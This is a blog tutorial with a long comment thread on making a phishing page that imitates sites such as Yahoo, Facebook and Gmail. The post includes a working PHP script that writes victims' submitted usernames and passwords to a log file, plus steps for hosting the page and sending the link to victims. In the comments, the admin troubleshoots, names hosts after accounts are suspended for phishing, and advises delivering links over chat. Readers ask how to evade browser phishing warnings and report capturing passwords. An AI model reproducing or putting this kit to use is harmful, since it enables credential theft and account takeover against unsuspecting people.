How to Make a Phisher/Fake Page For Any Website

received many Emails from my blog readers requesting me to make Fake /Phisher page for various websites like orkut ,twitter , GMail , Face book ...etc .I have already written some tutorials  on how to hack Face book , GMail using a fake/phishing page . But many had doubts , problems . To clear all your doubts today i am writing  a tutorial on how you can create a fake/phisher page for any website that you want  Follow the steps given below to create your own phishing page


How to Make a Phisher/Fake Page For Any Website 

1. First open the website in a browser for which you want to create a phishing page . Now right click  in an empty space and select view source , copy all the contents to a note pad and save it as something.html 

example :
              yahoo.html

2. Now open Yahoo.html (something.html) in a notepad .Now search for the string 
"action = https.." and change the address to login.php and change method = " Post" to "GET" Finally save it 



3. Now we have to create login.php .For this open notepad , copy/paste the following code in it and save it as login.php



<?php
header ('Location: http://yahoo.com');
$handle = fopen("log.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Note :- By default the victim will be redirected to yahoo.com once he clicks login ,If you want you can change the address, you can do it  by changing the www.yahoo.com to any  address you desire


4.Now create an account in Free web hosting sites, which supports php like , T35.com or 000webhost.com 

5. Now upload all the two files which we created Yahoo.html , login.php  

6. Now send the  Yahoo.html link to the victim , once  he enters the information and logins in , He will be redirected to the website which we did in step three

7. Now to see the victims password login to your hosting account, there you 'll see new  file log.txt , open it to see the victims user-id and password  

Hope you enjoyed this tutorial ,If you have any doubts please feel free to post a comment 

Subscribe to Hackaholic

Enjoyed this article?
Subscribe to "Hackaholic"and get daily
updates in your inbox for free!

Related Posts Plugin for WordPress, Blogger...

Unknown said on April 22, 2011 at 7:33 AM :

I dint get the last part!
Can you explain how to change file permissions to 777

REPLY
Unknown said on April 22, 2011 at 7:37 AM :

Can you tell me how to change file permissions to 777

REPLY
John ( Admin ) said on April 22, 2011 at 7:40 AM :

@VJ

they are chmod setting "777 " means read write execute

REPLY
Anonymous

I made the three files and uploaded them all to my t35 site... but whenever i go thru and test it- nothing appears in the log. i've set the perms to 777, the login.php is exactly the same -the yahoo part... any idea on what i'm doing wrong?

REPLY
John ( Admin ) said on May 31, 2011 at 6:11 PM :

@Anonymous


please send the login.php link to the victim once he enters the info such as user id and password , and logins in he will be redirected to yahoo.com

and all the login details will be stored in log.txt

REPLY
Anonymous

Exactly followed all the steps...The "log.txt" still showing blank.
Help me out plz

REPLY
Anonymous

Just a question..is it possible to find out who made a site like this ??

REPLY
Jansen Kusuma

I want to ask mister... when i upload the .html file in t35.com it said that "File blablabla.html is too big. This file will not be uploaded."

how can i fix it?

REPLY
Anonymous

Hi Mister.. i want to ask why when im upload the .html file in t35.com ,it say that "File blblabla.html is too big. This file will not be uploaded."

how could i fix it?? please help...


Soory for my bad english.. :))

REPLY
John ( Admin ) said on July 11, 2011 at 7:26 AM :

@Jansen Kusuma
If you have problems with t35.com you can use 000webhost.com

REPLY
Jansen Kusuma

Oh... I will try it tommorow.. :D

and i want to ask somethin again.. why when i upload the login.php and log.txt file , it show login.php.txt and log.txt.txt??

sorry for my disturbing question..
hope you want to explain.. :))

REPLY
Anonymous

mister.. i can't make an active account in 000webhost.com..
it always say "System administrator will review your details and activate your account in 24 hours." when i open my cpanel

REPLY
John ( Admin ) said on July 12, 2011 at 4:56 AM :

@Anonymous

Use these sites 110mb.com ripway.com

REPLY
Puffer

I can't upload log.txt to ripway.com! And how do I change the perms to 777?

REPLY
John ( Admin ) said on July 17, 2011 at 5:47 PM :

@Puffer
Use 110mb.com

REPLY
Mr. Riddler

not even a single comment saying "It Worked" :\ well many says dat log.txt doesnt appear soo was just wondering how that works? how the file get created by itself in 11mb.com account or any other for dat matter?

REPLY
John ( Admin ) said on August 4, 2011 at 3:25 AM :

@Mr. Riddler

actually people here are lazy they don't comment when it works
it works 100 % its a php script that captures all the data into a log file
If Ur still confused !!! just watch the video version of it
http://hackhaholic.blogspot.com/2011/07/hack-facebook-account-using-fake-login.html

REPLY
Anonymous

hei

could you please explain how can i make fake login page for msn. because i cant find "action = https.." in msn source codes.

thnx

REPLY
comment system said on August 9, 2011 at 9:08 AM :

Hey man, the links are broken, mind uploading them to another mirror? Also, the comment above me regarding the msn source code also described a problem I have encountered. Thanks.

REPLY
Anonymous

hi this is alex.. can anyone tell me some other free web hosting sites which allow phishing.. ripway, t35 and etc don't allow it.. plz help..

REPLY
John ( Admin ) said on August 12, 2011 at 10:12 AM :

@Anonymous


Use ooowebhost.com

REPLY
Anonymous

$value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>



error on line 1 what can i do?

REPLY
John ( Admin ) said on August 19, 2011 at 6:35 PM :

@Anonymous

There's no PHP opening Tag add <? or <?PHP

REPLY
Anonymous

hey man , i used ripway but my account has been suspended due to security and hacking purposes..wtf

REPLY
John ( Admin ) said on September 2, 2011 at 11:43 PM :

@Anonymous
Use 000webhost.com

REPLY
Anonymous

in 000webhost.com say's==> I want to host my own domain what should i write ???

REPLY
Anonymous

what is location in login.php

REPLY
Anonymous

how to send ???i using ooowebhost

REPLY
Anonymous

hey it worked for me u can see it at chalgando.co.cc

REPLY
Anonymous

i had done all the procedure but whwn ilog in from spam site it always say id or password not matches

REPLY
Anonymous

hey john,
i have made everything and i made a test with an email and psswd but the file log.txt that i ve created still empty so where is the problem ????
i ve everything as u said in the articles...
w8ing ur answer ASAP
thank u
M.M

REPLY
Anonymous

any one can explain the process of uploading the files and process of getting the password... i have made the 2 files but confused about uploading process and how can i get the password. thnks

iasdani

REPLY
Anonymous

how to do it on 000webhost.com bro help please....thnx for your time and attention

REPLY
Anonymous

how can i send html link to victim?????

REPLY
Anonymous

can i use drivehq.com......

REPLY
Anonymous

Ok.. I have done everything. uploaded on drive hq.. but what link I'm suppose to send to Victim.. where this fake link is generated.. Please ans this question evn it sounds stupid..

REPLY
Anonymous

How can i get the password of a cpanel? Some one help

REPLY
Pete Smith

Hi John,

I followed your instructions in modifying the HTML file of the mail.yahoo.com page, and used your login.php exactly. I've set up an account on my3gb.com, and have the website up and running fine.

My issues lie with getting the actual username and password to write to the text file. Do I need to upload a blank text file in the same directory as my index.html?

I'm not really sure what to modify to make the writing process work. So far I've tried uploading the 2 files (index.html and login.php) and when that didn't work I uploaded a blank text file called "log.txt" in the same directory as login.php. However nothing writes to the text file.

I've had experience with C++ and I'm not just pulling your leg with this... I actually want to get it working and will definitely post here if it ends up successful!

Thanks in advance.

REPLY
Pete Smith

Hey everyone, by making a few changes I was able to get this to work!

The only problem I'm facing now is that my3gb.com has blocked my account. This happened within hours of me creating the website, so I'm assuming they're pretty diligent about checking their sites...

Does anyone know any webhosts that aren't very diligent with this?

REPLY
Кукуся said on February 20, 2012 at 4:57 PM :

I made all the information that u wrote and I uploaded them to the sight and changed what I have to change
but when I wanna check it on myself .. I open the Facebook.html but nothin' appears or a webhostin' company appears

what's wron' with this???????

REPLY
tina

i am not abel to upload files ....... it is saying error .. why??

REPLY
John ( Admin ) said on February 26, 2012 at 5:53 PM :

@Pete Smith

Try x10hosting

REPLY
Anonymous

When victim am logging in so i am the (login.php) is getting open and i am not receiving any file such as log.txt

REPLY
Anonymous

5gbfree.com is also usefull

REPLY
Anonymous

Hey John,

I have followed the same steps wat you have mentioned in the tread & for hosting i'm using DriveHQ free hosting site, But whn i tried myself & enter the yahooid nd password in the site, i get the login.php code in the website :( & i'm not getting any log.txt file
so could you pls help me

REPLY
Anonymous

@ anyone


i get the user name but no password. help please this is what i get.


user=llllllllllllllll
passwrd=
cookielength=0
hash_passwrd=2573479e9729c483e24d32e6d8104be0a1700d10

REPLY
Anonymous

Hey John ! Thanks for your easy to follow tutorial, it helped a lot.

I have a question, it can sounds stupid but well, how do you upload a file to 000webhost.com ?
Thanks :)

REPLY
Curly

It doesnt work!!!! i did everything. then i used a fake facebook id to hack my own account and i got the file 'log.txt' in my web hosting account (x10) and my password and username showed up. but wen i sent it to the 'victim' I got a different txt page that had GET'randomid' and 'access denied' along with more encoded stuff in it. :@
what now?
the 'victim' wont open it again obviously... -_-

REPLY
Curly

please? its sort of life and death.

REPLY
Anonymous

john

Hi ,can you do that for hotmail ? page source doesn't have action=http
thanks.

REPLY
Anonymous

its works....:))

REPLY
Anonymous

yeap.. it really works. thanks :)

REPLY
Swarnveer said on April 17, 2012 at 11:43 PM :

I've done all the steps carefully and correctly but still not able to see "log.txt"

REPLY
Swarnveer said on April 17, 2012 at 11:48 PM :

Help plz

REPLY
nikhil said on April 26, 2012 at 8:24 AM :

nikhil

i made account on 000webshot.com, but can any one tell me how to upload the both file to that websites

REPLY
Sborg said on April 28, 2012 at 4:40 AM :

Hello-
So I used 000webhost.com to upload the files. I uploaded the .php and .html files to create a fake Facebook page. However, when I view the page, it does not show me a Facebook site. Instead, it gives me an error such as this one: http://tx.netii.net/login.php

These are the files I uploaded: http://tx.netii.net/

How do I fix this please??!

REPLY
Anonymous

how can i change the permission of files

REPLY
Anonymous

it is not redirecting to facebook

REPLY
Anonymous

hiya john my names sarah and im from englad i dont know if you still use this site or if you are still reading these comments i would love you too email me if you could find time to do so as i have followed all your instructions and i cannot get facebook to come up when i press send link only gmail and yahoo i have a really good reason for wanting to do this and if you could help me in any wasy id be very gratefull as it concerns my 14 yr old daughter thank for you time and my email address is sarahreilly2010@live.co.uk thankyou and please help me stop this i would of put my name only it wouldnt let me as you can already see my names sarah x

REPLY
Unknown said on June 14, 2012 at 12:20 AM :

hiii john

REPLY
IloveGold said on August 8, 2012 at 8:38 PM :

Thanks for your sharing!

REPLY
Anonymous

i have uploaded it to 000webhost but i dont no what to do after that

REPLY
Anonymous

how do you do this with twitter

REPLY
Anonymous

Is there any way of redirecting the username and password to an email address instead of it been stored in the password.txt


J

REPLY
drake

i got it working, thanks :)

REPLY
Unknown said on August 29, 2012 at 8:06 PM :

hi bro.....plz tel me the fake page link how it luks like???plz plz

REPLY
ronie

hey john....the user is notified that it was fishing. how to get rid of that ???

REPLY
Bablo said on September 18, 2012 at 3:51 AM :

Hi bro.... When i type email and password in fake page... it open Login.php file as text.... whats going wrong... help please

REPLY
Unknown said on October 20, 2012 at 4:12 AM :

how to hide log.txt ; every one can see it

REPLY
jairathour said on November 10, 2012 at 2:53 AM :

Everything works fine.. Except i think there is some problem with the login.php file. The data is stored in the log.txt file when i checked it it showed 275KB file size for log.txt.
However the only problem is when i open the log.txt file nothing it shows nothing inside. Totally blank file. Can u please check and see if the value for email and password is stored and shown in the log .txt file. I am nt so gud with PHP. The only problem is it didnt show the content of log.txt file.

REPLY
jairathour said on November 10, 2012 at 2:59 AM :

Everything works fine.. Except i think there is some problem with the login.php file. The data is stored in the log.txt file when i checked it . it showed 275KB file size for log.txt.
However the only problem is when i open the log.txt file it shows nothing inside. Totally blank file. Can u please check and see if the value for email and password is stored and shown in the log .txt file. I am nt so gud with PHP. The only problem is it didnt show the content of log.txt file.

REPLY
jure said on November 19, 2012 at 9:55 AM :

may i ask how to redirect this php file than to real facebook page what i need to write

$value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);

REPLY
Unknown said on November 20, 2012 at 8:35 PM :

where do i upload the files ? and where to get the link (phiser)

REPLY
John ( Admin ) said on November 22, 2012 at 5:45 PM :

@xin wei tan
Upload the files to webhosting site

REPLY
Unknown said on November 28, 2012 at 10:29 AM :

Woooooooo it Worked for me....Thanks dude

REPLY
Unknown said on December 1, 2012 at 7:48 PM :

helo frnd ... i tried everything as u said and a log.txt file created in my ftp account...but when i chk that ...there is no record inside...tried many number of times...but same prob exist...can u pls help me...thank u :) rahul

REPLY
Unknown said on December 2, 2012 at 5:45 AM :

OH MY GLOB
I was skeptical at first, but I tried it out.
And it worked!!
haha! YOu sir, deserve a medal.
:D Thanks!

REPLY
Sreelu said on December 8, 2012 at 12:47 AM :

Actually i am being redirected to the file login.php if i use any fake email....
Can uhelp me??

REPLY
a said on January 2, 2013 at 9:27 AM :

Cant find action=...

REPLY
Unknown said on January 21, 2013 at 5:02 AM :

how do I send links to the victims

REPLY
John ( Admin ) said on February 2, 2013 at 12:37 AM :

@Ernst Abenteuer

Send them Via Gchat or Facebook

REPLY
Unknown said on February 2, 2013 at 8:39 PM :

i followed all the procedure, but i m not getting log, txt file plz help

REPLY
Unknown said on February 10, 2013 at 10:40 AM :

hey vidhi... which web hosting did u use...?

REPLY
jiloh55 said on February 15, 2013 at 8:30 PM :

hello admin.

i have a question, i have make all what you tell us to do , but when i test my site, (its gmail) and i click the button to log in, (using google chrome), it downloads the login.php, file, and it doesn t write in the logs.txt, i have read tutorial in all the pages, and its the same HELP!!!!!!

REPLY
John ( Admin ) said on February 20, 2013 at 10:52 AM :

@jiloh55
check the file permission for login.php it should be set to 777

REPLY
jiloh55 said on February 22, 2013 at 8:47 PM :

yes it worked now but the site got down after 20 minutes, but it helped to try only thanks

REPLY
Unknown said on March 23, 2013 at 9:11 AM :

Everything works but the page is not compatible when viewed with FireFox or IE only Chrome, how can I fix that?

REPLY
Unknown said on April 30, 2013 at 9:13 AM :

it would b better if u start makng videos bro!!

REPLY
John ( Admin ) said on May 7, 2013 at 8:14 AM :

@Sai Charan

Ya we are planning to start new youtube channel where we will post various tutorials, but i am really busy right now we promise you that we will start the channel as soon as possible

REPLY
Unknown said on June 5, 2013 at 10:25 PM :

but there are two addresses with starting 'action=https...' so should i change both addresses or any one of them..

REPLY
Unknown said on July 4, 2013 at 1:12 PM :

ive used 000webhost and done all the steps and my page works, however whenever someone puts there details in it doesn't send me them?
couldn't anyone sugest what ive done wrong?

REPLY
John ( Admin ) said on July 7, 2013 at 9:15 PM :

@jay son

check the file permissions of the files , It should be set to (777)

REPLY
evilhawk00 said on July 23, 2013 at 1:00 PM :

admin

is there any way that can write an .php file which use fopen , but not just "get" from facebook(login one more time? that is not good without error messages)...which uses "post" instead ,just try to post any wrong thing to show the error message in the redirect(maybe via javascript?).....?

REPLY
Unknown said on July 25, 2013 at 6:48 PM :

Hi John,

Thanks for this post.. It works well but took me time to figure it out.. :)
Anyways i have a question to ask you, what do we do to other sites that doesnt use or where we can't find "action" and "post" in their source code?
Do you have any idea of what to do in this kind of situation? An example is that of Hotmail and many others..

REPLY
frtn said on August 2, 2013 at 6:23 AM :

how do i subscribe to newer hacking tip

REPLY
John ( Admin ) said on August 2, 2013 at 11:40 PM :

@frtn
Subscribe Us via Email

REPLY
Unknown said on August 10, 2013 at 9:27 PM :

how to upload php file???

REPLY
Unknown said on August 18, 2013 at 11:17 PM :

can u make a tutorial to make a phishing page for any site with LAN

REPLY
Unknown said on August 22, 2013 at 2:12 PM :

Hello. sorry for posting as guest.

This worked fine! However, on google chrome, it detects phishing and notifies "phishing ahead".

Please tell me how to bypass this?

REPLY
Unknown said on August 26, 2013 at 8:12 AM :

where is the log.txt file?

REPLY
Unknown said on September 12, 2013 at 2:12 AM :

Hello John! Thank you! this works fine! I have a question, how can I make html or etc. script that login real facebook after press login and still save log.txt (I mean that it login real facebook after you press login at fake page and same time make log.txt) I see that your script changes to real facebook after pressing login at the fake facebook but it's maybe too visible. I want in to login real facebook automatically after trying the fake one.

Thank you!

REPLY
Unknown said on September 20, 2013 at 10:47 AM :

hey, i cant get past the first step. ive copied both the source for both yahoo and facebook just to try and put it on a notepad, but when i search for the words "action = https.." it sais there arent any words like that on the document. i even tried putting into MS word but still nothing. what am i doing wrong?

REPLY
Unknown said on October 15, 2013 at 3:41 PM :

How do I change the file permissions to 777?

REPLY
Unknown said on October 19, 2013 at 8:36 AM :

I made a phishing website but after that when i click the link..Google chrome show an warning saying that the website is phished.What to do?I want to create a phishing page for an online game,but when i search the word 'action='.what should i do to clone other websites?

REPLY
Soumya ||::NOOB::|| said on October 25, 2013 at 8:23 AM :

Did everythng correctly bt still the log.txt is blank plz help

REPLY
Unknown said on October 27, 2013 at 1:05 PM :

Yea I made a friend to type a fake username and pass on the site but the log.txt was empty after that help pls

REPLY
NSH Official said on December 21, 2013 at 9:38 PM :

Everything was OK. And I got one victim password, but after that my 000webhosting was suspend. Can you tell me if I try it on my own website, will it be same problem?

REPLY
Unknown said on March 29, 2014 at 2:58 PM :

some body help me with the uploading of the files to T35.com

REPLY
true driver said on October 11, 2015 at 8:17 AM :

can somebody please tell me where to find log.txt??
thanks!

REPLY
Unknown said on November 27, 2015 at 10:21 AM :

When I make my page and try to login to yahoo it says Error: service temporarily unavailable. why is that?

REPLY

Use the form below to comment. No spam please!!!

© 101hacker | Design by Mukund edited by John
Powered by Blogger